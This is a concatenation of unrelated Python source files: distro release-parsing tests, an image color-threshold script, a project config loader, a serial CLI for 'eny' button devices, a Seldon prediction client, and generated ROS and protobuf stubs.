desired_info = {"id": "slackware", "name": "Slackware", "version_id": "14.1"}
distro_info = self._test_release_file_info("slackware-version", desired_info)
assert "codename" not in distro_info
def test_sles12_release(self) -> None:
desired_outcome = {
"id": "sles",
"name": "SLES",
"pretty_name": "SUSE Linux Enterprise Server 12 SP1",
"version": "12.1",
"pretty_version": "12.1 (n/a)",
"best_version": "12.1",
"codename": "n/a",
"major_version": "12",
"minor_version": "1",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "SuSE",
"name": "SUSE Linux Enterprise Server",
"version_id": "12",
"codename": "s390x",
}
self._test_release_file_info("SuSE-release", desired_info)
def test_ubuntu14_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 14.04.3 LTS",
"version": "14.04",
"pretty_version": "14.04 (Trusty Tahr)",
"best_version": "14.04.3",
"like": "debian",
"codename": "Trusty Tahr",
"major_version": "14",
"minor_version": "04",
}
self._test_outcome(desired_outcome)
        # Test the info from the searched distro release file.
        # Ubuntu does not have one; /etc/debian_version is not considered
        # a distro release file:
self._test_non_existing_release_file()
def test_ubuntu16_release(self) -> None:
desired_outcome = {
"id": "ubuntu",
"name": "Ubuntu",
"pretty_name": "Ubuntu 16.04.1 LTS",
"version": "16.04",
"pretty_version": "16.04 (xenial)",
"best_version": "16.04.1",
"like": "debian",
"codename": "xenial",
"major_version": "16",
"minor_version": "04",
}
self._test_outcome(desired_outcome)
        # Test the info from the searched distro release file.
        # Ubuntu does not have one; /etc/debian_version is not considered
        # a distro release file:
self._test_non_existing_release_file()
def test_amazon2016_release(self) -> None:
desired_outcome = {
"id": "amzn",
"name": "Amazon Linux AMI",
"pretty_name": "Amazon Linux AMI 2016.03",
"version": "2016.03",
"pretty_version": "2016.03",
"best_version": "2016.03",
"like": "rhel fedora",
"major_version": "2016",
"minor_version": "03",
}
self._test_outcome(desired_outcome)
def test_amazon2014_release(self) -> None:
# Amazon Linux 2014 only contains a system-release file.
# distro doesn't currently handle it.
self._test_outcome({})
def test_scientific6_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Scientific Linux",
"pretty_name": "Scientific Linux 6.4 (Carbon)",
"version": "6.4",
"pretty_version": "6.4 (Carbon)",
"best_version": "6.4",
"codename": "Carbon",
"major_version": "6",
"minor_version": "4",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Scientific Linux",
"version_id": "6.4",
"codename": "Carbon",
}
self._test_release_file_info("redhat-release", desired_info)
def test_scientific7_release(self) -> None:
desired_outcome = {
"id": "rhel",
"name": "Scientific Linux",
"pretty_name": "Scientific Linux 7.2 (Nitrogen)",
"version": "7.2",
"pretty_version": "7.2 (Nitrogen)",
"best_version": "7.2",
"like": "fedora",
"codename": "Nitrogen",
"major_version": "7",
"minor_version": "2",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "redhat",
"name": "Scientific Linux",
"version_id": "7.2",
"codename": "Nitrogen",
}
self._test_release_file_info("redhat-release", desired_info)
def test_gentoo_release(self) -> None:
desired_outcome = {
"id": "gentoo",
"name": "Gentoo",
"pretty_name": "Gentoo/Linux",
"version": "2.2",
"pretty_version": "2.2",
"best_version": "2.2",
"major_version": "2",
"minor_version": "2",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "gentoo",
"name": "Gentoo Base System",
"version_id": "2.2",
}
self._test_release_file_info("gentoo-release", desired_info)
def test_openelec6_release(self) -> None:
desired_outcome = {
"id": "openelec",
"name": "OpenELEC",
"pretty_name": "OpenELEC (official) - Version: 6.0.3",
"version": "6.0",
"pretty_version": "6.0",
"best_version": "6.0.3",
"major_version": "6",
"minor_version": "0",
}
self._test_outcome(desired_outcome)
def test_mandriva2011_release(self) -> None:
desired_outcome = {
"id": "mandrivalinux",
"name": "MandrivaLinux",
"pretty_name": "Mandriva Linux 2011.0",
"version": "2011.0",
"pretty_version": "2011.0 (turtle)",
"best_version": "2011.0",
"major_version": "2011",
"minor_version": "0",
"codename": "turtle",
}
self._test_outcome(desired_outcome)
desired_info = {
"id": "mandrake",
"name": "Mandriva Linux",
"version_id": "2011.0",
}
self._test_release_file_info("mandrake-release", desired_info)
def test_cloudlinux5_release(self) -> None:
# Uses redhat-release only to get information.
# The id of 'rhel' can only be fixed with issue #109.
desired_outcome = {
"id": "cloudlinux",
"codename": "Vladislav Volkov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 5.11 (Vladislav Volkov)",
"version": "5.11",
"pretty_version": "5.11 (Vladislav Volkov)",
"best_version": "5.11",
"major_version": "5",
"minor_version": "11",
}
self._test_outcome(desired_outcome)
def test_cloudlinux6_release(self) -> None:
# Same as above, only has redhat-release.
desired_outcome = {
"id": "cloudlinux",
"codename": "Oleg Makarov",
"name": "CloudLinux Server",
"pretty_name": "CloudLinux Server 6.8 (Oleg Makarov)",
"version": "6.8",
"pretty_version": "6.8 (Oleg Makarov)",
"best_version": "6.8",
"major_version": "6",
"minor_version": "8",
}
self._test_outcome(desired_outcome)
def test_cloudlinux7_release(self) -> None:
desired_outcome = {
"id": "cloudlinux",
"codename": "Yury Malyshev",
"name": "CloudLinux",
"pretty_name": "CloudLinux 7.3 (Yury Malyshev)",
"like": "rhel fedora centos",
"version": "7.3",
"pretty_version": "7.3 (Yury Malyshev)",
"best_version": "7.3",
"major_version": "7",
"minor_version": "3",
}
self._test_outcome(desired_outcome)
def _bad_os_listdir(path: str = ".") -> NoReturn:
"""This function is used by TestOverallWithEtcNotReadable to simulate
a folder that cannot be called with os.listdir() but files are still
readable. Forces distro to guess which *-release files are available."""
raise OSError()
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOverallWithEtcNotReadable(TestOverall):
def setup_method(self, test_method: FunctionType) -> None:
self._old_listdir = os.listdir
# Incompatible types in assignment (expression has type
# "Callable[[str], NoReturn]", variable has type overloaded function)
os.listdir = _bad_os_listdir # type: ignore[assignment]
super().setup_method(test_method)
def teardown_method(self, test_method: FunctionType) -> None:
super().teardown_method(test_method)
if os.listdir is _bad_os_listdir:
os.listdir = self._old_listdir
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestGetAttr(DistroTestCase):
"""Test the consistency between the results of
`{source}_release_attr()` and `{source}_release_info()` for all
distros in `DISTROS`.
"""
def _test_attr(self, info_method: str, attr_method: str) -> None:
for dist in DISTROS:
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
_distro = distro.LinuxDistribution()
info = getattr(_distro, info_method)()
for key in info.keys():
                try:
                    assert info[key] == getattr(_distro, attr_method)(key)
                except AssertionError:
                    # Report which distro/key mismatched, then fail the test
                    # instead of silently swallowing the assertion.
                    print(f"distro: {dist}, key: {key}")
                    raise
def test_os_release_attr(self) -> None:
self._test_attr("os_release_info", "os_release_attr")
def test_lsb_release_attr(self) -> None:
self._test_attr("lsb_release_info", "lsb_release_attr")
def test_distro_release_attr(self) -> None:
self._test_attr("distro_release_info", "distro_release_attr")
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestInfo(DistroTestCase):
def setup_method(self, test_method: FunctionType) -> None:
super().setup_method(test_method)
self.ubuntu14_os_release = os.path.join(
DISTROS_DIR, "ubuntu14", "etc", "os-release"
)
self.fedora30_os_release = os.path.join(
DISTROS_DIR, "fedora30", "etc", "os-release"
)
def test_info(self) -> None:
_distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file=self.ubuntu14_os_release,
distro_release_file="path-to-non-existing-file",
)
desired_info = {
"id": "ubuntu",
"version": "14.04",
"like": "debian",
"version_parts": {"major": "14", "minor": "04", "build_number": ""},
"codename": "Trusty Tahr",
}
info = _distro.info()
assert info == desired_info
desired_info_diff: Dict[str, Any] = {"version": "14.04 (Trusty Tahr)"}
desired_info.update(desired_info_diff)
info = _distro.info(pretty=True)
assert info == desired_info
desired_info_diff = {
"version": "14.04.3",
"version_parts": {"major": "14", "minor": "04", "build_number": "3"},
}
desired_info.update(desired_info_diff)
info = _distro.info(best=True)
assert info == desired_info
desired_info_diff = {"version": "14.04.3 (Trusty Tahr)"}
desired_info.update(desired_info_diff)
info = _distro.info(pretty=True, best=True)
assert info == desired_info
def test_none(self) -> None:
def _test_none(info: distro.InfoDict) -> None:
assert info["id"] == ""
assert info["version"] == ""
assert info["like"] == ""
assert info["version_parts"]["major"] == ""
assert info["version_parts"]["minor"] == ""
assert info["version_parts"]["build_number"] == ""
assert info["codename"] == ""
_distro = distro.LinuxDistribution(
include_lsb=False,
os_release_file="path-to-non-existing-file",
distro_release_file="path-to-non-existing-file",
)
info = _distro.info()
_test_none(info)
info = _distro.info(best=True)
_test_none(info)
info = _distro.info(pretty=True)
_test_none(info)
info = _distro.info(pretty=True, best=True)
_test_none(info)
def test_linux_distribution(self) -> None:
_distro = distro.LinuxDistribution(
include_lsb=False, os_release_file=self.ubuntu14_os_release
)
i = _distro.linux_distribution()
assert i == ("Ubuntu", "14.04", "Trusty Tahr")
_distro = distro.LinuxDistribution(
include_lsb=False, os_release_file=self.fedora30_os_release
)
i = _distro.linux_distribution()
assert i == ("Fedora", "30", "Thirty")
def test_linux_distribution_full_false(self) -> None:
_distro = distro.LinuxDistribution(
include_lsb=False, os_release_file=self.ubuntu14_os_release
)
i = _distro.linux_distribution(full_distribution_name=False)
assert i == ("ubuntu", "14.04", "Trusty Tahr")
def test_all(self) -> None:
"""Test info() by comparing its results with the results of specific
consolidated accessor functions.
"""
def _test_all(
info: distro.InfoDict, best: bool = False, pretty: bool = False
) -> None:
assert info["id"] == _distro.id()
assert info["version"] == _distro.version(pretty=pretty, best=best)
assert info["version_parts"]["major"] == _distro.major_version(best=best)
assert info["version_parts"]["minor"] == _distro.minor_version(best=best)
assert info["version_parts"]["build_number"] == _distro.build_number(
best=best
)
assert info["like"] == _distro.like()
assert info["codename"] == _distro.codename()
assert len(info["version_parts"]) == 3
assert len(info) == 5
for dist in DISTROS:
self._setup_for_distro(os.path.join(DISTROS_DIR, dist))
_distro = distro.LinuxDistribution()
info = _distro.info()
_test_all(info)
info = _distro.info(best=True)
_test_all(info, best=True)
info = _distro.info(pretty=True)
_test_all(info, pretty=True)
info = _distro.info(pretty=True, best=True)
_test_all(info, pretty=True, best=True)
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestOSReleaseParsing:
"""Test the parsing of os-release files."""
def setup_method(self, test_method: FunctionType) -> None:
self.distro = distro.LinuxDistribution(include_lsb=False)
def _get_props(self, input: str) -> Dict[str, str]:
return self.distro._parse_os_release_content(io.StringIO(input))
def _test_zero_length_props(self, input: str) -> None:
props = self._get_props(input)
assert len(props) == 0
def _test_empty_value(self, input: str) -> None:
props = self._get_props(input)
assert props.get("key", None) == ""
def _test_parsed_value(self, input: str) -> None:
props = self._get_props(input)
assert props.get("key", None) == "value"
def test_kv_01_empty_file(self) -> None:
self._test_zero_length_props("")
def test_kv_02_empty_line(self) -> None:
self._test_zero_length_props("\n")
def test_kv_03_empty_line_with_crlf(self) -> None:
self._test_zero_length_props("\r\n")
def test_kv_04_empty_line_with_just_cr(self) -> None:
self._test_zero_length_props("\r")
def test_kv_05_comment(self) -> None:
self._test_zero_length_props("# KEY=value\n")
def test_kv_06_empty_value(self) -> None:
self._test_empty_value("KEY=\n")
def test_kv_07_empty_value_single_quoted(self) -> None:
self._test_empty_value("KEY=''\n")
def test_kv_08_empty_value_double_quoted(self) -> None:
self._test_empty_value('KEY=""\n')
def test_kv_09_word(self) -> None:
self._test_parsed_value("KEY=value\n")
def test_kv_10_word_no_newline(self) -> None:
self._test_parsed_value("KEY=value")
def test_kv_11_word_with_crlf(self) -> None:
self._test_parsed_value("KEY=value\r\n")
def test_kv_12_word_with_just_cr(self) -> None:
self._test_parsed_value("KEY=value\r")
def test_kv_13_word_with_multi_blanks(self) -> None:
self._test_empty_value("KEY= cmd \n")
# Note: Without quotes, this assigns the empty string, and 'cmd' is
# a separate token that is being ignored (it would be a command
# in the shell).
def test_kv_14_unquoted_words(self) -> None:
self._test_parsed_value("KEY=value cmd\n")
def test_kv_15_double_quoted_words(self) -> None:
props = self._get_props('KEY="a simple value" cmd\n')
assert props.get("key", None) == "a simple value"
def test_kv_16_double_quoted_words_with_multi_blanks(self) -> None:
props = self._get_props('KEY=" a simple value "\n')
assert props.get("key", None) == " a simple value "
def test_kv_17_double_quoted_word_with_single_quote(self) -> None:
props = self._get_props('KEY="it\'s value"\n')
assert props.get("key", None) == "it's value"
def test_kv_18_double_quoted_word_with_double_quote(self) -> None:
props = self._get_props('KEY="a \\"bold\\" move"\n')
assert props.get("key", None) == 'a "bold" move'
def test_kv_19_single_quoted_words(self) -> None:
props = self._get_props("KEY='a simple value'\n")
assert props.get("key", None) == "a simple value"
def test_kv_20_single_quoted_words_with_multi_blanks(self) -> None:
props = self._get_props("KEY=' a simple value '\n")
assert props.get("key", None) == " a simple value "
def test_kv_21_single_quoted_word_with_double_quote(self) -> None:
props = self._get_props("KEY='a \"bold\" move'\n")
assert props.get("key", None) == 'a "bold" move'
def test_kv_22_quoted_unicode_wordchar(self) -> None:
# "wordchar" means it is in the shlex.wordchars variable.
props = self._get_props('KEY="wordchar: \u00CA (E accent grave)"\n')
assert props.get("key", None) == "wordchar: \u00CA (E accent grave)"
def test_kv_23_quoted_unicode_non_wordchar(self) -> None:
# "non-wordchar" means it is not in the shlex.wordchars variable.
props = self._get_props(
'KEY="non-wordchar: \u00A1 (inverted exclamation mark)"\n'
)
assert (
props.get("key", None) == "non-wordchar: \u00A1 (inverted exclamation mark)"
)
def test_kv_24_double_quoted_entire_single_quoted_word(self) -> None:
props = self._get_props("KEY=\"'value'\"\n")
assert props.get("key", None) == "'value'"
def test_kv_25_single_quoted_entire_double_quoted_word(self) -> None:
props = self._get_props("KEY='\"value\"'\n")
assert props.get("key", None) == '"value"'
def test_kv_26_double_quoted_multiline(self) -> None:
props = self.distro._parse_os_release_content(
io.StringIO('KEY="a multi\n' 'line value"\n')
)
assert props.get("key", None) == "a multi\nline value"
# TODO: Find out why the result is not 'a multi line value'
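        # (A newline inside double quotes is preserved literally in POSIX shell
        # quoting, so keeping "\n" here may actually be the correct behavior.)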
def test_kv_27_double_quoted_multiline_2(self) -> None:
props = self._get_props("KEY=' a simple value '\n")
props = self.distro._parse_os_release_content(
io.StringIO('KEY="a multi\n' 'line=value"\n')
)
assert props.get("key", None) == "a multi\nline=value"
# TODO: Find out why the result is not 'a multi line=value'
def test_kv_28_double_quoted_word_with_equal(self) -> None:
props = self._get_props('KEY="var=value"\n')
assert props.get("key", None) == "var=value"
def test_kv_29_single_quoted_word_with_equal(self) -> None:
props = self._get_props("KEY='var=value'\n")
assert props.get("key", None) == "var=value"
def test_kx_01(self) -> None:
props = self.distro._parse_os_release_content(
io.StringIO("KEY1=value1\n" 'KEY2="value 2"\n')
)
assert props.get("key1", None) == "value1"
assert props.get("key2", None) == "value 2"
def test_kx_02(self) -> None:
props = self.distro._parse_os_release_content(
io.StringIO("# KEY1=value1\n" 'KEY2="value 2"\n')
)
assert props.get("key1", None) is None
assert props.get("key2", None) == "value 2"
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestGlobal:
"""Test the global module-level functions, and default values of their
arguments.
"""
def setup_method(self, test_method: FunctionType) -> None:
pass
def test_global(self) -> None:
# Because the module-level functions use the module-global
# LinuxDistribution instance, it would influence the tested
# code too much if we mocked that in order to use the distro
# specific release files. Instead, we let the functions use
# the release files of the distro this test runs on, and
# compare the result of the global functions with the result
# of the methods on the global LinuxDistribution object.
def _test_consistency(
function: str, kwargs: Optional[Dict[str, Any]] = None
) -> None:
kwargs = kwargs or {}
method_result = getattr(MODULE_DISTRO, function)(**kwargs)
function_result = getattr(distro, function)(**kwargs)
assert method_result == function_result
kwargs = {"full_distribution_name": True}
with pytest.deprecated_call():
_test_consistency("linux_distribution", kwargs)
kwargs = {"full_distribution_name": False}
with pytest.deprecated_call():
_test_consistency("linux_distribution", kwargs)
kwargs = {"pretty": False}
_test_consistency("name", kwargs)
_test_consistency("version", kwargs)
_test_consistency("info", kwargs)
kwargs = {"pretty": True}
_test_consistency("name", kwargs)
_test_consistency("version", kwargs)
_test_consistency("info", kwargs)
kwargs = {"best": False}
_test_consistency("version", kwargs)
_test_consistency("version_parts", kwargs)
_test_consistency("major_version", kwargs)
_test_consistency("minor_version", kwargs)
_test_consistency("build_number", kwargs)
_test_consistency("info", kwargs)
kwargs = {"best": True}
_test_consistency("version", kwargs)
_test_consistency("version_parts", kwargs)
_test_consistency("major_version", kwargs)
_test_consistency("minor_version", kwargs)
_test_consistency("build_number", kwargs)
_test_consistency("info", kwargs)
_test_consistency("id")
_test_consistency("like")
_test_consistency("codename")
_test_consistency("info")
_test_consistency("os_release_info")
_test_consistency("lsb_release_info")
_test_consistency("distro_release_info")
_test_consistency("uname_info")
os_release_keys = [
"name",
"version",
"id",
"id_like",
"pretty_name",
"version_id",
"codename",
]
for key in os_release_keys:
_test_consistency("os_release_attr", {"attribute": key})
lsb_release_keys = ["distributor_id", "description", "release", "codename"]
for key in lsb_release_keys:
_test_consistency("lsb_release_attr", {"attribute": key})
distro_release_keys = ["id", "name", "version_id", "codename"]
for key in distro_release_keys:
_test_consistency("distro_release_attr", {"attribute": key})
uname_keys = ["id", "name", "release"]
for key in uname_keys:
_test_consistency("uname_attr", {"attribute": key})
@pytest.mark.skipif(not IS_LINUX, reason="Irrelevant on non-linux")
class TestRepr:
"""Test the __repr__() method."""
def test_repr(self) -> None:
# We test that the class name and the names of all instance attributes
# show up in the repr() string.
repr_str = repr(distro._distro)
assert "LinuxDistribution" in repr_str
for attr in MODULE_DISTRO.__dict__.keys():
if attr in ("root_dir", "etc_dir", "usr_lib_dir"):
continue
assert f"{attr}=" in repr_str
|
py | b40b3b25beeed99b7b72c35a7a5e5632f8421789 | import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
# Read in the image and print out some stats
image = mpimg.imread('test.jpg')
print('This image is:', type(image),
      'with dimensions:', image.shape)
# Grab the x and y size and make a copy of the image
ysize = image.shape[0]
xsize = image.shape[1]
# Note: always make a copy rather than simply using "="
color_select = np.copy(image)
# Define our color selection criteria
# Note: if you run this code, you'll find these are not sensible values!!
# But you'll get a chance to play with them soon in a quiz
red_threshold = 200
green_threshold = 200
blue_threshold = 200
rgb_threshold = [red_threshold, green_threshold, blue_threshold]
# Identify pixels below the threshold
thresholds = (image[:,:,0] < rgb_threshold[0]) \
| (image[:,:,1] < rgb_threshold[1]) \
| (image[:,:,2] < rgb_threshold[2])
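# The mask is True wherever ANY channel falls below its threshold; those
# pixels are blacked out, keeping only the bright (near-white) pixels.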
color_select[thresholds] = [0,0,0]
# Display the image
plt.imshow(color_select)
plt.show()
|
py | b40b3c45cc6eb2951ada60b405553a7119d18a4d | import json
import logging
import os
DEFAULT = {
# UDP config
"UDP_RCV_IP": "",
"UDP_RCV_PORT": 8080,
"UDP_SND_IP": "255.255.255.255",
"UDP_SND_PORT": 8080,
# BloomFilter config
"BF_BITS": 800000,
"BF_NHASHFUNS": 3,
"BF_ARRSZ_BITS": 8,
# BloomFilter Manager config
"BFMGR_INIT_NDBFS": 6,
"BFMGR_MAX_DBF_POOLSZ": 6,
"BFMGR_LOGLEVEL": logging.INFO,
# BackGround Worker config
"BGWRK_LOGLEVEL": logging.INFO,
# Background Task config
"BG_GEN_EphID_SECS": 60,
"BG_SHARE_EphID_SECS": 10,
"BG_RECV_CHECK_SECS": 10,
"BG_DBF_MOVE_TO_NEXT": 600,
"BG_DBFPOOL_UPDATE_SECS": 600,
"BG_QBF_GEN_SECS": 3600,
# Server config
"URL_TEMPLATE": "http://ec2-3-26-37-172.ap-southeast-2.compute.amazonaws.com:9000/comp4337/{0}",
"URL_SUFFIX": {
"UPLOAD": "cbf/upload",
"QUERY": "qbf/query"
},
# Debugging config
"STDOUT_LOGLEVEL": logging.INFO,
"ALL_LOG_LEVEL": logging.INFO,
"DEBUG_MODE": True,
"ALL_LOG_FILE": "log.txt",
# MISC config
# Shamir Algo config
"NUM_SECRET_PARTS": 6,
"NUM_THRESHOLD": 3
}
def dump_default_json(filepath):
with open(filepath, "w") as f:
json.dump(DEFAULT, f, indent=4)
# Load the user-given configuration; falls back to DEFAULT when no path is given.
def load_grp03_global_config(filepath=None):
if (not filepath):
filepath = "./default_conf.json"
dump_default_json(filepath)
print(f"NOTICE: Using default configuration, the config is dumping to {os.path.abspath(filepath)}\n")
return DEFAULT
# try open the file, let it fail if not exist
with open(filepath, "r") as f:
config = json.load(f)
# verify important keys
for k in DEFAULT.keys():
if (k not in config.keys()):
raise ValueError(f"Missing configuration entry key : {k}")
print(f"Using custom configuration file {os.path.abspath(filepath)}")
return config |
py | b40b3ce6b3782cef768ad13a5c783e9e5dd79e1a | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Eny command"""
from __future__ import print_function
import argparse
import glob
import collections
import sys
import re
import serial
import threading
__version__ = '0.5.0'
Eny = collections.namedtuple('Eny', 'id cumulated')
RESULT_CODE = {
'00': 'Success',
'02': 'Too few arguments',
'03': 'Too many arguments',
'05': 'Invalid value',
'07': 'Table full',
    '08': 'Already registered',
}
class DoubleClick(object):
"""Check double click."""
def __init__(self, single_click, double_click, wait_time=1.0):
self.single_click = single_click
self.double_click = double_click
self.wait_time = wait_time
self.timer = threading.Timer(self.wait_time, self.on_timer)
self.last = None
def on_click(self, eny_obj):
"""Click handler"""
if self.last is not None and self.last.id == eny_obj.id:
            # Second click from the same device within wait_time -> double click.
self.double_click(eny_obj)
self.last = None
self.timer.cancel()
else:
if self.last is not None and self.last.id != eny_obj.id:
self.single_click(self.last)
self.last = eny_obj
self.timer.cancel()
self.timer = threading.Timer(self.wait_time, self.on_timer)
self.timer.start()
def on_timer(self):
"""timer"""
self.single_click(self.last)
self.last = None
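# Example wiring (illustrative; assumes `uart` is an open serial.Serial):
#   clicks = DoubleClick(single_click=print, double_click=lambda e: print('double', e))
#   handle_click(uart, clicks.on_click)  # or simply use handle_double_click() below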
def parse(line):
"""Parse string from eny serial
Args:
line (str): The UART text
Returns:
Eny: Eny named tuple
"""
line = str(line)
if not line.startswith('rcv ok : '):
return None
line = line.replace('rcv ok : ', '')
    # str.translate(None, chars) only works on Python 2; replace() is portable.
    line = line.replace(' ', '')
    line = line.replace('\r', '').replace('\n', '')
pairs = line.split(',')
if len(pairs) < 3:
return None
kvs = dict(pair.split('=') for pair in pairs)
return Eny(id=kvs['cid'],
cumulated=int(kvs['cum_no'], 16))
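# Illustrative round-trip (field names from the parser above; extra fields are ignored):
#   parse('rcv ok : cid=0000abcd, cum_no=001f, rssi=-40\r\n')
#   -> Eny(id='0000abcd', cumulated=31)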
def get_port_names():
"""Returns available serial ports."""
if sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
ports = glob.glob('/dev/ttyUSB*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.usbserial*')
else:
raise EnvironmentError('Unsupported platform')
    if len(ports) == 0:
raise EnvironmentError('eny not connected')
return ports
def handle_click(uart, handler):
"""Listen eny event"""
try:
print(u'Ctl-c to exit')
while True:
line = uart.readline()
eny_obj = parse(line)
            if eny_obj is not None:
handler(eny_obj)
except KeyboardInterrupt:
print(u' - Quitting')
def handle_double_click(uart, single_click, double_click, wait_time=0.8):
"""Listen eny event with Double click"""
handler = DoubleClick(single_click, double_click, wait_time)
handle_click(uart, handler.on_click)
def main():
"""Eny command line"""
args = _init_parser()
if args.port is None:
args.port = get_port_names()[0]
cmd = args.which
if cmd == 'pair add':
cmd += ' ' + args.device_id
elif cmd == 'pair del':
cmd += ' ' + str(args.device_index)
with serial.Serial(args.port, args.baudrate) as uart:
if cmd == 'listen':
handle_click(uart, print)
else:
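            # These pairing/reset commands echo a result code mapped in RESULT_CODE.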
has_result_code = re.compile(r'pair add|del|reset')
uart.write(cmd + '\r\n')
uart.timeout = 0.5
line = None
while line != '':
line = uart.readline()
                if line == '\r' or len(line) == 0:
continue
elif has_result_code.search(cmd) is not None:
code = line.split(' ')[0]
print(RESULT_CODE[code])
else:
print(line)
uart.flush()
uart.close()
def _init_parser():
"""Initialize argument parser"""
parser = argparse.ArgumentParser(description='Eny client')
# eny -port /dev/ttyUSB*
    # nargs=1 would wrap the value in a list; these options are used as scalars.
    parser.add_argument(
        '--port',
        default=None,
        type=str,
        help='Port name like /dev/ttyUSB*')
# eny -baudrate 115200
    parser.add_argument(
        '--baudrate',
        default=115200,
        type=int,
        help='baudrate, default: %(default)s')
sub = parser.add_subparsers()
# eny get_id
get_id = sub.add_parser(
'get_id',
        description='Show own TX ID. ID is an 8-digit hexadecimal number.')
get_id.set_defaults(which='get_id')
# eny listen
listen = sub.add_parser(
'listen',
description='Listen raw UART')
listen.set_defaults(which='listen')
# eny pair
pair = sub.add_parser(
'pair',
description='Pair commands').add_subparsers()
# eny pair view
pair_view = pair.add_parser(
'view',
        description='Show the current pairing list.')
pair_view.set_defaults(which='pair view')
# eny pair add FFFFFFFF
pair_add = pair.add_parser(
'add',
description='Add a pairing ID to the pairing list.'
        + ' (Requires a vacant slot in the list.)')
pair_add.set_defaults(which='pair add')
pair_add.add_argument(
'device_id',
type=str,
        help='ID is an 8-digit hexadecimal number (00000001~fffffffe).')
# eny pair del 31
pair_del = pair.add_parser(
'del',
        description='Delete a pairing ID from the pairing list.')
pair_del.set_defaults(which='pair del')
pair_del.add_argument(
'device_index',
type=int,
choices=range(0, 32),
        help='Input is a table number (0~31).')
# eny pair reset
pair_reset = pair.add_parser(
'reset',
description='Reset pair list')
pair_reset.set_defaults(which='pair reset')
return parser.parse_args()
if __name__ == '__main__':
main()
|
py | b40b3e17303e2a222b52b25eb33ace3035b587e2 | # generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/su/bw_ws/src/px-ros-pkg/px_comm/msg/CameraInfo.msg;/home/su/bw_ws/src/px-ros-pkg/px_comm/msg/Mavlink.msg;/home/su/bw_ws/src/px-ros-pkg/px_comm/msg/OpticalFlow.msg"
services_str = "/home/su/bw_ws/src/px-ros-pkg/px_comm/srv/SetCameraInfo.srv"
pkg_name = "px_comm"
dependencies_str = "geometry_msgs;std_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "px_comm;/home/su/bw_ws/src/px-ros-pkg/px_comm/msg;geometry_msgs;/opt/ros/kinetic/share/geometry_msgs/cmake/../msg;std_msgs;/opt/ros/kinetic/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/kinetic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
|
py | b40b3f0f295efddc301d13d68cdd2310731d633b | import logging
from time import sleep
import pandas as pd
from sklearn.model_selection import train_test_split
from seldon_core.seldon_client import SeldonClient
import numpy as np
df_cols = ["prev_idx", "parent_idx", "body", "removed"]
df = pd.read_csv(
"https://raw.githubusercontent.com/axsauze/reddit-classification-exploration/master/data/reddit_train.csv",
names=df_cols,
skiprows=1,
encoding="ISO-8859-1",
)
df.head()
x = df["body"].values
y = df["removed"].values
logging.info("Train test split.")
_, x_test, _, _ = train_test_split(
x, y, stratify=y, random_state=42, test_size=0.1, shuffle=True
)
sc = SeldonClient(
gateway="ambassador",
transport="rest",
gateway_endpoint="localhost:8080",
namespace="seldon",
)
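# Assumes the Seldon/Ambassador gateway is reachable at localhost:8080,
# e.g. via a `kubectl port-forward` to the cluster's ingress service.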
def send_client_request(test_text):
client_prediction = sc.predict(
data=np.array([test_text]),
deployment_name="abtest",
names=["text"],
payload_type="ndarray",
)
print(client_prediction)
return client_prediction
for i in range(len(x_test)):
to_classify_text = x_test[i]
prediction = send_client_request(to_classify_text)
sleep(0.5)
|
py | b40b3f40605d8bc52f2917a15532298f22a1d326 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v2/proto/errors/feed_item_error.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v2/proto/errors/feed_item_error.proto',
package='google.ads.googleads.v2.errors',
syntax='proto3',
serialized_options=_b('\n\"com.google.ads.googleads.v2.errorsB\022FeedItemErrorProtoP\001ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v2/errors;errors\242\002\003GAA\252\002\036Google.Ads.GoogleAds.V2.Errors\312\002\036Google\\Ads\\GoogleAds\\V2\\Errors\352\002\"Google::Ads::GoogleAds::V2::Errors'),
